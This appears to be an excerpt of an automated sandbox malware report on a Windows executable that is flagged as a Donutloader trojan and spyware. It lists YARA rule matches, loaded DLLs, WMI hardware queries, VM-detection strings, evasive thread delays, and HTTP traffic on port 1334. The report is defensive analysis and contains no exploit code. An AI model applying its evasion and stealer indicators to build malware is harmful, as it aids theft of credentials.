          Source: 00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8B72890_3_00007FFD9B8B7289
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8BAF300_3_00007FFD9B8BAF30
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8BAE700_3_00007FFD9B8BAE70
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8C461C0_3_00007FFD9B8C461C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8C0B280_3_00007FFD9B8C0B28
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8BF25E0_3_00007FFD9B8BF25E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8BB1250_3_00007FFD9B8BB125
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8BAE680_3_00007FFD9B8BAE68
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B8C34FA0_3_00007FFD9B8C34FA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9BB4C3410_3_00007FFD9BB4C341
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9BB4A7CC0_3_00007FFD9BB4A7CC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9BB49CC90_3_00007FFD9BB49CC9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9BB4B4650_3_00007FFD9BB4B465
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9BB4CC9A0_3_00007FFD9BB4CC9A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B971EE50_3_00007FFD9B971EE5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B9701470_3_00007FFD9B970147
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00007FFD9B9729BE0_3_00007FFD9B9729BE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001D6098CAA1C0_2_000001D6098CAA1C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001D6098CADF80_2_000001D6098CADF8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001D6098CE4D40_2_000001D6098CE4D4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001D6098CBCDC0_2_000001D6098CBCDC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001D6098CB2280_2_000001D6098CB228
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000001D6098C9B400_2_000001D6098C9B40
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356
          Source: file.exeStatic PE information: Number of sections : 11 > 10
          Source: file.exe, 00000000.00000002.1956078575.000001D60B499000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
          Source: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: 00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: WERB6FD.tmp.dmp.4.drBinary string: \Device\Harddisk0\Partition3.384070+
          Source: WERB6FD.tmp.dmp.4.drBinary string: \Device\Harddisk0\Partition3
          Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@2/49@1/1
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
          Source: C:\Users\user\Desktop\file.exeMutant created: NULL
          Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\CWMxSt
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAAB3.tmpJump to behavior
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: tmpE31C.tmp.0.dr, tmpAAB3.tmp.0.dr, tmpE31B.tmp.0.dr, tmpE32C.tmp.0.dr, tmpE32D.tmp.0.dr, tmpAAC4.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeString found in binary or memory: -START(0
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356
          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: file.exeStatic file information: File size 2208256 > 1048576
          Source: file.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x13f600
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.pdb` source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Windows.Forms.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.pdbp source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Configuration.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Net.Http.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Configuration.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Windows.Forms.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: mscorlib.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Net.Http.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Management.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Core.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Runtime.Serialization.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Xml.pdb3X2 source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.pdb0 source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERB6FD.tmp.dmp.4.dr
          Source: Binary string: System.ServiceModel.ni.pdb source: WERB6FD.tmp.dmp.4.dr
          Source: file.exeStatic PE information: real checksum: 0x217197 should be: 0x21f17c
          Source: file.exeStatic PE information: section name: .xdata

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1334
          Source: unknownNetwork traffic detected: HTTP traffic on port 1334 -> 49733
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 1D609830000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory allocated: 1D6233D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 8197Jump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1592Jump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 5296Thread sleep time: -34126476536362649s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: Amcache.hve.4.drBinary or memory string: VMware
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.4.drBinary or memory string: vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
